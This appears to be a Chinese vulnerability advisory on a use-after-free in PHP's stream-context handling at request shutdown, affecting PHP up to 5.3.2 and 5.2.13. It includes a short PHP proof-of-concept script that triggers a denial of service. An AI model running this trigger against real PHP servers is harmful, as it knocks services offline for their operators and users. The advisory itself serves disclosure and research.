受影响系统:
PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
描述:
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的请求关闭实现中存在释放后使用漏洞。如果流上下文结构在执行销毁操作之前便已被释放,则PHP使用该流上下文就会导致拒绝服务。
<*来源:Mateusz Kocielski
链接:http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
$blah = fopen(‘/dev/zero’,’a’);
$arr = array();
for ( $i = 0 ; $i < 5000 ; $i++ ) {
$arr[$i] = "";
}
stream_context_get_options($blah);
$a88 = fread($blah,100000000000);
?>
建议:
厂商补丁:
PHP
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。